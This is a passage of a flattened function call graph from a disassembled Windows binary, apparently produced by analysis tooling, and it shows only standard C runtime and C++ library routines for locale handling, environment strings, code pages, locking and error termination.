95dc40 LeaveCriticalSection 16328->16331 16330 962b56 16330->16319 16331->16330 16332->16322 16334 962e24 __Getctype 16333->16334 16335 962e4b __Getctype 16333->16335 16334->16335 16340 96a91f 16334->16340 16335->16324 16454 95dc40 LeaveCriticalSection 16337->16454 16339 962c70 16339->16219 16342 96a99f 16340->16342 16343 96a935 16340->16343 16344 96314b ___free_lconv_mon 14 API calls 16342->16344 16367 96a9ed 16342->16367 16343->16342 16348 96314b ___free_lconv_mon 14 API calls 16343->16348 16350 96a968 16343->16350 16345 96a9c1 16344->16345 16346 96314b ___free_lconv_mon 14 API calls 16345->16346 16351 96a9d4 16346->16351 16347 96314b ___free_lconv_mon 14 API calls 16352 96a994 16347->16352 16354 96a95d 16348->16354 16349 96a9fb 16353 96aa5b 16349->16353 16362 96314b 14 API calls ___free_lconv_mon 16349->16362 16355 96314b ___free_lconv_mon 14 API calls 16350->16355 16366 96a98a 16350->16366 16356 96314b ___free_lconv_mon 14 API calls 16351->16356 16357 96314b ___free_lconv_mon 14 API calls 16352->16357 16358 96314b ___free_lconv_mon 14 API calls 16353->16358 16368 969bd5 16354->16368 16360 96a97f 16355->16360 16361 96a9e2 16356->16361 16357->16342 16363 96aa61 16358->16363 16396 96a089 16360->16396 16365 96314b ___free_lconv_mon 14 API calls 16361->16365 16362->16349 16363->16335 16365->16367 16366->16347 16408 96aa90 16367->16408 16369 969be6 16368->16369 16395 969ccf 16368->16395 16370 969bf7 16369->16370 16371 96314b ___free_lconv_mon 14 API calls 16369->16371 16372 969c09 16370->16372 16373 96314b ___free_lconv_mon 14 API calls 16370->16373 16371->16370 16374 969c1b 16372->16374 16375 96314b ___free_lconv_mon 14 API calls 16372->16375 16373->16372 16376 969c2d 16374->16376 16378 96314b ___free_lconv_mon 14 API calls 16374->16378 16375->16374 16377 969c3f 16376->16377 16379 96314b ___free_lconv_mon 14 API calls 16376->16379 16380 969c51 16377->16380 16381 96314b ___free_lconv_mon 14 API calls 16377->16381 16378->16376 16379->16377 16382 969c63 16380->16382 16383 96314b ___free_lconv_mon 14 API calls 16380->16383 16381->16380 16384 969c75 16382->16384 16386 96314b ___free_lconv_mon 14 API calls 16382->16386 16383->16382 16385 969c87 16384->16385 16387 96314b ___free_lconv_mon 14 API calls 16384->16387 16388 969c99 16385->16388 16389 96314b ___free_lconv_mon 14 API calls 16385->16389 16386->16384 16387->16385 16390 96314b ___free_lconv_mon 14 API calls 16388->16390 16392 969cab 16388->16392 16389->16388 16390->16392 16391 969cbd 16394 96314b ___free_lconv_mon 14 API calls 16391->16394 16391->16395 16392->16391 16393 96314b ___free_lconv_mon 14 API calls 16392->16393 16393->16391 16394->16395 16395->16350 16397 96a096 16396->16397 16407 96a0ee 16396->16407 16398 96314b ___free_lconv_mon 14 API calls 16397->16398 16402 96a0a6 16397->16402 16398->16402 16399 96a0b8 16401 96a0ca 16399->16401 16403 96314b ___free_lconv_mon 14 API calls 16399->16403 16400 96314b ___free_lconv_mon 14 API calls 16400->16399 16404 96a0dc 16401->16404 16405 96314b ___free_lconv_mon 14 API calls 16401->16405 16402->16399 16402->16400 16403->16401 16406 96314b ___free_lconv_mon 14 API calls 16404->16406 16404->16407 16405->16404 16406->16407 16407->16366 16409 96aabc 16408->16409 16410 96aa9d 16408->16410 16409->16349 16410->16409 16414 96a5a4 16410->16414 16413 96314b ___free_lconv_mon 14 API calls 16413->16409 16415 96a682 16414->16415 16416 96a5b5 16414->16416 16415->16413 16450 96a303 16416->16450 16419 96a303 __Getctype 14 API calls 16420 96a5c8 16419->16420 16421 96a303 __Getctype 14 API calls 16420->16421 16422 96a5d3 16421->16422 16423 96a303 __Getctype 14 API calls 16422->16423 16424 96a5de 16423->16424 16425 96a303 __Getctype 14 API calls 16424->16425 16426 96a5ec 16425->16426 16427 96314b ___free_lconv_mon 14 API calls 16426->16427 16428 96a5f7 16427->16428 16429 96314b ___free_lconv_mon 14 API calls 16428->16429 16430 96a602 16429->16430 16431 96314b ___free_lconv_mon 14 API calls 16430->16431 16432 96a60d 16431->16432 16433 96a303 __Getctype 14 API calls 16432->16433 16434 96a61b 16433->16434 16435 96a303 __Getctype 14 API calls 16434->16435 16436 96a629 16435->16436 16437 96a303 __Getctype 14 API calls 16436->16437 16438 96a63a 16437->16438 16439 96a303 __Getctype 14 API calls 16438->16439 16440 96a648 16439->16440 16441 96a303 __Getctype 14 API calls 16440->16441 16442 96a656 16441->16442 16443 96314b ___free_lconv_mon 14 API calls 16442->16443 16444 96a661 16443->16444 16445 96314b ___free_lconv_mon 14 API calls 16444->16445 16446 96a66c 16445->16446 16447 96314b ___free_lconv_mon 14 API calls 16446->16447 16448 96a677 16447->16448 16449 96314b ___free_lconv_mon 14 API calls 16448->16449 16449->16415 16451 96a315 16450->16451 16452 96a324 16451->16452 16453 96314b ___free_lconv_mon 14 API calls 16451->16453 16452->16419 16453->16451 16454->16339 16491 963185 16455->16491 16458 963298 16459 9632a4 ___scrt_is_nonwritable_in_current_image 16458->16459 16460 962fb1 __strnicoll 14 API calls 16459->16460 16464 9632d1 std::locale::_Setgloballocale 16459->16464 16465 9632cb std::locale::_Setgloballocale 16459->16465 16460->16465 16461 963318 16462 95fc57 __strnicoll 14 API calls 16461->16462 16463 96331d 16462->16463 16502 95cfdf 16463->16502 16467 963344 16464->16467 16505 95dbf8 EnterCriticalSection 16464->16505 16465->16461 16465->16464 16484 963302 16465->16484 16469 963386 16467->16469 16470 963477 16467->16470 16481 9633b5 16467->16481 16476 962e60 _unexpected 41 API calls 16469->16476 16469->16481 16473 963482 16470->16473 16510 95dc40 LeaveCriticalSection 16470->16510 16475 96067b std::locale::_Setgloballocale 23 API calls 16473->16475 16477 96348a 16475->16477 16479 9633aa 16476->16479 16478 962e60 _unexpected 41 API calls 16482 96340a 16478->16482 16480 962e60 _unexpected 41 API calls 16479->16480 16480->16481 16506 963424 16481->16506 16483 962e60 _unexpected 41 API calls 16482->16483 16482->16484 16483->16484 16484->16223 16486 95cdff __fread_nolock std::locale::_Setgloballocale 16485->16486 16487 95ce2b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16486->16487 16489 95cefc std::locale::_Setgloballocale 16487->16489 16575 958791 16489->16575 16490 95cf1a 16490->16230 16492 963191 ___scrt_is_nonwritable_in_current_image 16491->16492 16497 95dbf8 EnterCriticalSection 16492->16497 16494 96319f 16498 9631dd 16494->16498 16497->16494 16501 95dc40 LeaveCriticalSection 16498->16501 16500 95d060 16500->16223 16500->16458 16501->16500 16511 95cf2b 16502->16511 16505->16467 16507 96342a 16506->16507 16509 9633fb 16506->16509 16574 95dc40 LeaveCriticalSection 16507->16574 16509->16478 16509->16482 16509->16484 16510->16473 16512 95cf3d _Fputc 16511->16512 16517 95cf62 16512->16517 16514 95cf55 16528 95cd1b 16514->16528 16518 95cf72 16517->16518 16519 95cf79 16517->16519 16534 95cd80 GetLastError 16518->16534 16524 95cf87 16519->16524 16538 95cd57 16519->16538 16522 95cfae 16522->16524 16541 95d00c IsProcessorFeaturePresent 16522->16541 16524->16514 16525 95cfde 16526 95cf2b __strnicoll 41 API calls 16525->16526 16527 95cfeb 16526->16527 16527->16514 16529 95cd27 16528->16529 16530 95cd3e 16529->16530 16567 95cdc6 16529->16567 16532 95cd51 16530->16532 16533 95cdc6 _Fputc 41 API calls 16530->16533 16532->16484 16533->16532 16535 95cd99 16534->16535 16545 963062 16535->16545 16539 95cd62 GetLastError SetLastError 16538->16539 16540 95cd7b 16538->16540 16539->16522 16540->16522 16542 95d018 16541->16542 16543 95cde3 std::locale::_Setgloballocale 8 API calls 16542->16543 16544 95d02d GetCurrentProcess TerminateProcess 16543->16544 16544->16525 16546 963075 16545->16546 16547 96307b 16545->16547 16548 963b8a __strnicoll 6 API calls 16546->16548 16549 963bc9 __strnicoll 6 API calls 16547->16549 16551 95cdb1 SetLastError 16547->16551 16548->16547 16550 963095 16549->16550 16550->16551 16552 96367b __strnicoll 14 API calls 16550->16552 16551->16519 16553 9630a5 16552->16553 16554 9630c2 16553->16554 16555 9630ad 16553->16555 16557 963bc9 __strnicoll 6 API calls 16554->16557 16556 963bc9 __strnicoll 6 API calls 16555->16556 16558 9630b9 16556->16558 16559 9630ce 16557->16559 16562 96314b ___free_lconv_mon 14 API calls 16558->16562 16560 9630d2 16559->16560 16561 9630e1 16559->16561 16563 963bc9 __strnicoll 6 API calls 16560->16563 16564 962c8e __strnicoll 14 API calls 16561->16564 16562->16551 16563->16558 16565 9630ec 16564->16565 16566 96314b ___free_lconv_mon 14 API calls 16565->16566 16566->16551 16568 95cdd0 16567->16568 16569 95cdd9 16567->16569 16570 95cd80 _Fputc 16 API calls 16568->16570 16569->16530 16571 95cdd5 16570->16571 16571->16569 16572 95d05b CallUnexpected 41 API calls 16571->16572 16573 95cde2 16572->16573 16574->16509 16576 958799 16575->16576 16577 95879a IsProcessorFeaturePresent 16575->16577 16576->16490 16579 959052 16577->16579 16582 959015 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16579->16582 16581 959135 16581->16490 16582->16581 16584 9609f7 16583->16584 16585 9609e1 16583->16585 16584->16088 16585->16584 16589 960a04 16585->16589 16587 9609ee 16587->16584 16606 960b6f 16587->16606 16590 960a10 16589->16590 16591 960a0d 16589->16591 16614 968f89 16590->16614 16591->16587 16596 960a21 16598 96314b ___free_lconv_mon 14 API calls 16596->16598 16597 960a2d 16641 960a5e 16597->16641 16600 960a27 16598->16600 16600->16587 16602 96314b ___free_lconv_mon 14 API calls 16603 960a51 16602->16603 16604 96314b ___free_lconv_mon 14 API calls 16603->16604 16605 960a57 16604->16605 16605->16587 16607 960be0 16606->16607 16610 960b7e 16606->16610 16607->16584 16608 968035 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 16608->16610 16609 96367b __strnicoll 14 API calls 16609->16610 16610->16607 16610->16608 16610->16609 16612 960be4 16610->16612 16613 96314b ___free_lconv_mon 14 API calls 16610->16613 16611 96314b ___free_lconv_mon 14 API calls 16611->16607 16612->16611 16613->16610 16615 968f92 16614->16615 16616 960a16 16614->16616 16663 962f1b 16615->16663 16620 96928b GetEnvironmentStringsW 16616->16620 16621 9692a3 16620->16621 16622 960a1b 16620->16622 16623 968035 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 16621->16623 16622->16596 16622->16597 16624 9692c0 16623->16624 16625 9692d5 16624->16625 16626 9692ca FreeEnvironmentStringsW 16624->16626 16627 963e93 std::_Locinfo::_Locinfo_ctor 15 API calls 16625->16627 16626->16622 16628 9692dc 16627->16628 16629 9692e4 16628->16629 16630 9692f5 16628->16630 16632 96314b ___free_lconv_mon 14 API calls 16629->16632 16631 968035 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 16630->16631 16633 969305 16631->16633 16634 9692e9 FreeEnvironmentStringsW 16632->16634 16635 969314 16633->16635 16636 96930c 16633->16636 16634->16622 16638 96314b ___free_lconv_mon 14 API calls 16635->16638 16637 96314b ___free_lconv_mon 14 API calls 16636->16637 16639 969312 FreeEnvironmentStringsW 16637->16639 16638->16639 16639->16622 16642 960a73 16641->16642 16643 96367b __strnicoll 14 API calls 16642->16643 16644 960a9a 16643->16644 16645 960aa2 16644->16645 16646 960aac 16644->16646 16647 96314b ___free_lconv_mon 14 API calls 16645->16647 16649 960b09 16646->16649 16651 96367b __strnicoll 14 API calls 16646->16651 16652 960b18 16646->16652 16656 960b33 16646->16656 16658 96314b ___free_lconv_mon 14 API calls 16646->16658 16906 962a15 16646->16906 16648 960a34 16647->16648 16648->16602 16650 96314b ___free_lconv_mon 14 API calls 16649->16650 16650->16648 16651->16646 16915 960b40 16652->16915 16659 95d00c _Deallocate 11 API calls 16656->16659 16657 96314b ___free_lconv_mon 14 API calls 16660 960b25 16657->16660 16658->16646 16661 960b3f 16659->16661 16662 96314b ___free_lconv_mon 14 API calls 16660->16662 16662->16648 16664 962f26 16663->16664 16665 962f2c 16663->16665 16667 963b8a __strnicoll 6 API calls 16664->16667 16666 963bc9 __strnicoll 6 API calls 16665->16666 16685 962f32 16665->16685 16668 962f46 16666->16668 16667->16665 16669 96367b __strnicoll 14 API calls 16668->16669 16668->16685 16671 962f56 16669->16671 16670 95d05b CallUnexpected 41 API calls 16672 962fb0 16670->16672 16673 962f73 16671->16673 16674 962f5e 16671->16674 16676 963bc9 __strnicoll 6 API calls 16673->16676 16675 963bc9 __strnicoll 6 API calls 16674->16675 16683 962f6a 16675->16683 16677 962f7f 16676->16677 16678 962f92 16677->16678 16679 962f83 16677->16679 16680 962c8e __strnicoll 14 API calls 16678->16680 16682 963bc9 __strnicoll 6 API calls 16679->16682 16684 962f9d 16680->16684 16681 96314b ___free_lconv_mon 14 API calls 16681->16685 16682->16683 16683->16681 16686 96314b ___free_lconv_mon 14 API calls 16684->16686 16685->16670 16687 962f37 16685->16687 16686->16687 16688 968d94 16687->16688 16711 968ee9 16688->16711 16695 968df0 16697 96314b ___free_lconv_mon 14 API calls 16695->16697 16696 968dfe 16736 968fe4 16696->16736 16699 968dd7 16697->16699 16699->16616 16701 968e36 16702 95fc57 __strnicoll 14 API calls 16701->16702 16704 968e3b 16702->16704 16703 968e7d 16706 968ec6 16703->16706 16747 968a06 16703->16747 16707 96314b ___free_lconv_mon 14 API calls 16704->16707 16705 968e51 16705->16703 16708 96314b ___free_lconv_mon 14 API calls 16705->16708 16710 96314b ___free_lconv_mon 14 API calls 16706->16710 16707->16699 16708->16703 16710->16699 16712 968ef5 ___scrt_is_nonwritable_in_current_image 16711->16712 16713 968f0f 16712->16713 16755 95dbf8 EnterCriticalSection 16712->16755 16715 968dbe 16713->16715 16718 95d05b CallUnexpected 41 API calls 16713->16718 16722 968b14 16715->16722 16716 968f4b 16756 968f68 16716->16756 16720 968f88 16718->16720 16719 968f1f 16719->16716 16721 96314b ___free_lconv_mon 14 API calls 16719->16721 16721->16716 16760 95fc6a 16722->16760 16725 968b47 16727 968b5e 16725->16727 16728 968b4c GetACP 16725->16728 16726 968b35 GetOEMCP 16726->16727 16727->16699 16729 963e93 16727->16729 16728->16727 16730 963ed1 16729->16730 16734 963ea1 __strnicoll 16729->16734 16731 95fc57 __strnicoll 14 API calls 16730->16731 16733 963ecf 16731->16733 16732 963ebc HeapAlloc 16732->16733 16732->16734 16733->16695 16733->16696 16734->16730 16734->16732 16735 960179 codecvt 2 API calls 16734->16735 16735->16734 16737 968b14 43 API calls 16736->16737 16738 969004 16737->16738 16740 969041 IsValidCodePage 16738->16740 16744 96907d __fread_nolock 16738->16744 16739 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 16741 968e2b 16739->16741 16742 969053 16740->16742 16740->16744 16741->16701 16741->16705 16743 969082 GetCPInfo 16742->16743 16746 96905c __fread_nolock 16742->16746 16743->16744 16743->16746 16744->16739 16802 968be8 16746->16802 16748 968a12 ___scrt_is_nonwritable_in_current_image 16747->16748 16880 95dbf8 EnterCriticalSection 16748->16880 16750 968a1c 16881 968a53 16750->16881 16755->16719 16759 95dc40 LeaveCriticalSection 16756->16759 16758 968f6f 16758->16713 16759->16758 16761 95fc81 16760->16761 16762 95fc88 16760->16762 16761->16725 16761->16726 16762->16761 16763 962e60 _unexpected 41 API calls 16762->16763 16764 95fca9 16763->16764 16768 9635bf 16764->16768 16769 9635d2 16768->16769 16770 95fcbf 16768->16770 16769->16770 16776 96ab6b 16769->16776 16772 96361d 16770->16772 16773 963645 16772->16773 16774 963630 16772->16774 16773->16761 16774->16773 16797 968fd1 16774->16797 16777 96ab77 ___scrt_is_nonwritable_in_current_image 16776->16777 16778 962e60 _unexpected 41 API calls 16777->16778 16779 96ab80 16778->16779 16780 96abc6 16779->16780 16789 95dbf8 EnterCriticalSection 16779->16789 16780->16770 16782 96ab9e 16790 96abec 16782->16790 16787 95d05b CallUnexpected 41 API calls 16788 96abeb 16787->16788 16789->16782 16791 96abfa __Getctype 16790->16791 16793 96abaf 16790->16793 16792 96a91f __Getctype 14 API calls 16791->16792 16791->16793 16792->16793 16794 96abcb 16793->16794 16795 95dc40 std::_Lockit::~_Lockit LeaveCriticalSection 16794->16795 16796 96abc2 16795->16796 16796->16780 16796->16787 16798 962e60 _unexpected 41 API calls 16797->16798 16799 968fd6 16798->16799 16800 968ee9 __strnicoll 41 API calls 16799->16800 16801 968fe1 16800->16801 16801->16773 16803 968c10 GetCPInfo 16802->16803 16812 968cd9 16802->16812 16808 968c28 16803->16808 16803->16812 16805 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 16806 968d92 16805->16806 16806->16744 16813 964ea4 16808->16813 16811 96519b 45 API calls 16811->16812 16812->16805 16814 95fc6a __strnicoll 41 API calls 16813->16814 16815 964ec4 16814->16815 16833 967fb9 16815->16833 16817 964f80 16836 958250 16817->16836 16818 964ef1 16818->16817 16821 963e93 std::_Locinfo::_Locinfo_ctor 15 API calls 16818->16821 16823 964f88 16818->16823 16824 964f16 __fread_nolock __alloca_probe_16 16818->16824 16819 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 16822 964fab 16819->16822 16821->16824 16828 96519b 16822->16828 16823->16819 16824->16817 16825 967fb9 __fread_nolock MultiByteToWideChar 16824->16825 16826 964f61 16825->16826 16826->16817 16827 964f6c GetStringTypeW 16826->16827 16827->16817 16829 95fc6a __strnicoll 41 API calls 16828->16829 16830 9651ae 16829->16830 16843 964fad 16830->16843 16834 967fca MultiByteToWideChar 16833->16834 16834->16818 16837 95826b 16836->16837 16838 95825a 16836->16838 16837->16823 16838->16837 16840 95d040 16838->16840 16841 96314b ___free_lconv_mon 14 API calls 16840->16841 16842 95d058 16841->16842 16842->16837 16844 964fc8 16843->16844 16845 967fb9 __fread_nolock MultiByteToWideChar 16844->16845 16849 96500e 16845->16849 16846 965186 16847 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 16846->16847 16848 965199 16847->16848 16848->16811 16849->16846 16850 963e93 std::_Locinfo::_Locinfo_ctor 15 API calls 16849->16850 16852 965034 __alloca_probe_16 16849->16852 16860 9650ba 16849->16860 16850->16852 16851 958250 __freea 14 API calls 16851->16846 16853 967fb9 __fread_nolock MultiByteToWideChar 16852->16853 16852->16860 16854 965079 16853->16854 16854->16860 16871 963d48 16854->16871 16857 9650e3 16859 96516e 16857->16859 16861 963e93 std::_Locinfo::_Locinfo_ctor 15 API calls 16857->16861 16864 9650f5 __alloca_probe_16 16857->16864 16858 9650ab 16858->16860 16863 963d48 std::_Locinfo::_Locinfo_ctor 6 API calls 16858->16863 16862 958250 __freea 14 API calls 16859->16862 16860->16851 16861->16864 16862->16860 16863->16860 16864->16859 16865 963d48 std::_Locinfo::_Locinfo_ctor 6 API calls 16864->16865 16866 965138 16865->16866 16866->16859 16877 968035 16866->16877 16868 965152 16868->16859 16869 96515b 16868->16869 16870 958250 __freea 14 API calls 16869->16870 16870->16860 16872 96387a std::_Locinfo::_Locinfo_ctor 5 API calls 16871->16872 16873 963d53 16872->16873 16874 963da5 std::_Locinfo::_Locinfo_ctor 5 API calls 16873->16874 16876 963d59 16873->16876 16875 963d99 LCMapStringW 16874->16875 16875->16876 16876->16857 16876->16858 16876->16860 16879 96804c WideCharToMultiByte 16877->16879 16879->16868 16880->16750 16891 95f17d 16881->16891 16883 968a75 16884 95f17d __fread_nolock 41 API calls 16883->16884 16885 968a94 16884->16885 16886 968a29 16885->16886 16887 96314b ___free_lconv_mon 14 API calls 16885->16887 16888 968a47 16886->16888 16887->16886 16905 95dc40 LeaveCriticalSection 16888->16905 16890 968a35 16890->16706 16892 95f18e 16891->16892 16893 95f18a ctype 16891->16893 16894 95f195 16892->16894 16898 95f1a8 __fread_nolock 16892->16898 16893->16883 16895 95fc57 __strnicoll 14 API calls 16894->16895 16896 95f19a 16895->16896 16897 95cfdf __strnicoll 41 API calls 16896->16897 16897->16893 16898->16893 16899 95f1d6 16898->16899 16900 95f1df 16898->16900 16901 95fc57 __strnicoll 14 API calls 16899->16901 16900->16893 16902 95fc57 __strnicoll 14 API calls 16900->16902 16903 95f1db 16901->16903 16902->16903 16904 95cfdf __strnicoll 41 API calls 16903->16904 16904->16893 16905->16890 16907 962a31 16906->16907 16908 962a23 16906->16908 16909 95fc57 __strnicoll 14 API calls 16907->16909 16908->16907 16913 962a49 16908->16913 16910 962a39 16909->16910 16912 95cfdf __strnicoll 41 API calls 16910->16912 16911 962a43 16911->16646 16912->16911 16913->16911 16914 95fc57 __strnicoll 14 API calls 16913->16914 16914->16910 16916 960b1e 16915->16916 16917 960b4d 16915->16917 16916->16657 16918 960b64 16917->16918 16919 96314b ___free_lconv_mon 14 API calls 16917->16919 16920 96314b ___free_lconv_mon 14 API calls 16918->16920 16919->16917 16920->16916 16927 951da2 16921->16927 16923 951d9a 16924 954e83 16923->16924 17171 953ddb 16924->17171 16932 951b10 16927->16932 16929 951dbb 16943 953d16 16929->16943 16931 951dd0 16931->16923 16933 951b49 16932->16933 16934 951b19 16932->16934 16935 958448 codecvt 43 API calls 16933->16935 16934->16933 16936 951b1e 16934->16936 16939 951b53 16935->16939 16948 958448 16936->16948 16938 951b64 16938->16929 16939->16938 16970 95136c 16939->16970 16941 951b63 16941->16929 16942 951b29 16942->16929 16944 953d1e 16943->16944 16945 953d2c 16944->16945 17162 9546d8 16944->17162 16945->16931 16951 95844d 16948->16951 16950 958467 16950->16942 16951->16950 16952 960179 codecvt 2 API calls 16951->16952 16953 958469 16951->16953 16985 95dc6e 16951->16985 16952->16951 16954 95469e Concurrency::cancel_current_task 16953->16954 16955 958473 codecvt 16953->16955 16976 9599c2 16954->16976 16957 9599c2 Concurrency::cancel_current_task RaiseException 16955->16957 16958 958dec 16957->16958 16959 9546ba codecvt 16960 9599c2 Concurrency::cancel_current_task RaiseException 16959->16960 16961 9546d7 16960->16961 16979 952810 16961->16979 16964 9599c2 Concurrency::cancel_current_task RaiseException 16965 9546f7 codecvt 16964->16965 16982 952952 16965->16982 16968 9599c2 Concurrency::cancel_current_task RaiseException 16969 954727 16968->16969 16969->16942 16971 95137d 16970->16971 17026 9529bd 16971->17026 16973 95139a 17029 951e60 16973->17029 16975 9513a4 shared_ptr 16975->16941 16977 9599dc 16976->16977 16978 959a09 RaiseException 16976->16978 16977->16978 16978->16959 16992 95275f 16979->16992 17003 9524ea 16982->17003 16990 963e93 __strnicoll 16985->16990 16986 963ed1 16987 95fc57 __strnicoll 14 API calls 16986->16987 16989 963ecf 16987->16989 16988 963ebc HeapAlloc 16988->16989 16988->16990 16989->16951 16990->16986 16990->16988 16991 960179 codecvt 2 API calls 16990->16991 16991->16990 16995 959940 16992->16995 16996 95278b 16995->16996 16997 95994d 16995->16997 16996->16964 16997->16996 16998 95dc6e ___std_exception_copy 15 API calls 16997->16998 16999 95996a 16998->16999 17000 95997a 16999->17000 17001 962a15 ___std_exception_copy 41 API calls 16999->17001 17002 95d040 std::exception_ptr::~exception_ptr 14 API calls 17000->17002 17001->17000 17002->16996 17004 95250c 17003->17004 17005 95275f std::exception::exception 42 API calls 17004->17005 17006 95251f 17005->17006 17011 9547df 17006->17011 17009 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17010 95254c 17009->17010 17010->16968 17012 95252d 17011->17012 17013 9547ea 17011->17013 17012->17009 17015 951800 17013->17015 17016 95180d 17015->17016 17017 95181a _Deallocate 17015->17017 17019 95351a 17016->17019 17017->17012 17020 953534 17019->17020 17021 953537 17019->17021 17020->17017 17022 95cf2b __strnicoll 41 API calls 17021->17022 17023 95cffe 17022->17023 17024 95d00c _Deallocate 11 API calls 17023->17024 17025 95d00b 17024->17025 17038 953ca9 17026->17038 17028 9529cb 17028->16973 17065 95498b 17029->17065 17032 951e99 17068 951263 17032->17068 17034 951800 _Deallocate 41 API calls 17034->17032 17037 951eb2 17037->16975 17041 951e1a InitOnceBeginInitialize 17038->17041 17040 953cb9 17040->17028 17042 951e55 17041->17042 17044 951e34 17041->17044 17043 95d05b CallUnexpected 41 API calls 17042->17043 17046 951e52 17043->17046 17044->17046 17048 953cc2 17044->17048 17046->17040 17049 953ce7 17048->17049 17050 951e3e InitOnceComplete 17048->17050 17056 95872d AcquireSRWLockExclusive 17049->17056 17050->17046 17052 953cf3 17052->17050 17061 9586c7 17052->17061 17057 958741 17056->17057 17058 958746 ReleaseSRWLockExclusive 17057->17058 17060 95877c SleepConditionVariableSRW 17057->17060 17058->17052 17060->17057 17062 95869a 44 API calls 17061->17062 17063 953d07 17062->17063 17064 9586dc AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 17063->17064 17064->17050 17085 952d43 17065->17085 17069 951286 17068->17069 17102 953971 17069->17102 17071 9512a2 17074 9512c7 17071->17074 17108 952284 17071->17108 17111 95453d 17074->17111 17076 951312 17077 951322 17076->17077 17114 954793 17076->17114 17118 951ce2 17077->17118 17078 951800 _Deallocate 41 API calls 17078->17076 17082 952ca9 17083 954793 41 API calls 17082->17083 17084 952cb4 Concurrency::details::_CancellationTokenRegistration::~_CancellationTokenRegistration 17083->17084 17084->17037 17086 951e83 17085->17086 17087 952d4e 17085->17087 17086->17032 17086->17034 17089 9515c5 17087->17089 17090 9515dc 17089->17090 17092 9515e2 17089->17092 17093 95389b 17090->17093 17092->17086 17094 9538ef 17093->17094 17098 9538a8 17093->17098 17095 954980 43 API calls 17094->17095 17096 9538f4 17095->17096 17096->17092 17097 9538ca 17100 9549a6 43 API calls 17097->17100 17098->17097 17099 951800 _Deallocate 41 API calls 17098->17099 17099->17097 17101 9538de 17100->17101 17101->17092 17103 953990 17102->17103 17124 951efc 17103->17124 17105 9539ee shared_ptr 17105->17071 17106 9539ad shared_ptr 17106->17105 17127 9541b6 17106->17127 17143 951777 17108->17143 17110 9522a7 17110->17074 17112 952d43 43 API calls 17111->17112 17113 9512f2 17112->17113 17113->17076 17113->17078 17115 9547ab 17114->17115 17116 95479b 17114->17116 17115->17077 17117 951800 _Deallocate 41 API calls 17116->17117 17117->17115 17119 951d00 17118->17119 17120 958448 codecvt 43 API calls 17119->17120 17121 951d07 17120->17121 17154 9544a3 17121->17154 17123 95132e 17123->17082 17125 958448 codecvt 43 API calls 17124->17125 17126 951f06 17125->17126 17126->17106 17128 9541d3 17127->17128 17129 958448 codecvt 43 API calls 17128->17129 17130 9541da 17129->17130 17133 954158 17130->17133 17132 9541f8 17132->17105 17134 95417c 17133->17134 17142 9541a1 17133->17142 17135 954f79 50 API calls 17134->17135 17138 954187 17135->17138 17136 953f42 53 API calls 17137 9541b0 17136->17137 17137->17132 17139 95419b 17138->17139 17140 9550a5 43 API calls 17138->17140 17141 9560ad ReleaseSRWLockExclusive 17139->17141 17140->17139 17141->17142 17142->17136 17142->17137 17144 951781 17143->17144 17146 95178a 17143->17146 17147 95355e 17144->17147 17146->17110 17148 953584 17147->17148 17149 95356e 17147->17149 17151 954980 43 API calls 17148->17151 17150 9549a6 43 API calls 17149->17150 17152 953574 17150->17152 17153 953589 17151->17153 17152->17146 17155 9544af __EH_prolog3_catch 17154->17155 17158 954471 17155->17158 17157 9544c4 codecvt 17157->17123 17159 954485 17158->17159 17160 95447d 17158->17160 17159->17160 17161 9551e8 49 API calls 17159->17161 17160->17157 17161->17160 17163 952810 codecvt 42 API calls 17162->17163 17164 9546e9 17163->17164 17165 9599c2 Concurrency::cancel_current_task RaiseException 17164->17165 17166 9546f7 codecvt 17165->17166 17167 952952 codecvt 42 API calls 17166->17167 17168 954719 17167->17168 17169 9599c2 Concurrency::cancel_current_task RaiseException 17168->17169 17170 953d3b 17169->17170 17172 953de3 17171->17172 17173 9546d8 43 API calls 17172->17173 17174 953dfc 17173->17174 17177 953e0f 17174->17177 17179 9548ce 17174->17179 17188 95409c 17177->17188 17180 9548da __EH_prolog3_catch 17179->17180 17181 9548f3 17180->17181 17193 9534eb 17180->17193 17183 9534eb 53 API calls 17181->17183 17184 954916 17181->17184 17183->17184 17186 95491e codecvt 17184->17186 17200 954231 17184->17200 17186->17177 17325 95284f 17188->17325 17191 9599c2 Concurrency::cancel_current_task RaiseException 17192 9540bd 17191->17192 17204 954f79 17193->17204 17195 9534fa 17196 95350e 17195->17196 17210 956248 17195->17210 17215 9560ad 17196->17215 17201 954239 17200->17201 17311 9551dd 17201->17311 17218 95609c 17204->17218 17207 954f82 17209 954f96 17207->17209 17221 956419 17207->17221 17209->17195 17303 9561f7 17210->17303 17214 956268 17214->17195 17216 953513 17215->17216 17217 9560b9 ReleaseSRWLockExclusive 17215->17217 17216->17181 17217->17216 17227 9560cb GetCurrentThreadId 17218->17227 17222 95642f std::_Throw_Cpp_error 17221->17222 17248 956356 17222->17248 17228 9560f5 17227->17228 17229 956114 17227->17229 17232 9560fa AcquireSRWLockExclusive 17228->17232 17238 95610a 17228->17238 17230 956134 17229->17230 17231 95611d 17229->17231 17234 956193 17230->17234 17241 95614c 17230->17241 17233 956128 AcquireSRWLockExclusive 17231->17233 17231->17238 17232->17238 17233->17238 17236 95619a TryAcquireSRWLockExclusive 17234->17236 17234->17238 17235 958791 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 17237 9560a9 17235->17237 17236->17238 17237->17207 17238->17235 17240 956183 TryAcquireSRWLockExclusive 17240->17238 17240->17241 17241->17238 17241->17240 17242 957f69 17241->17242 17245 957fa7 17242->17245 17244 957f74 __aulldiv __aullrem 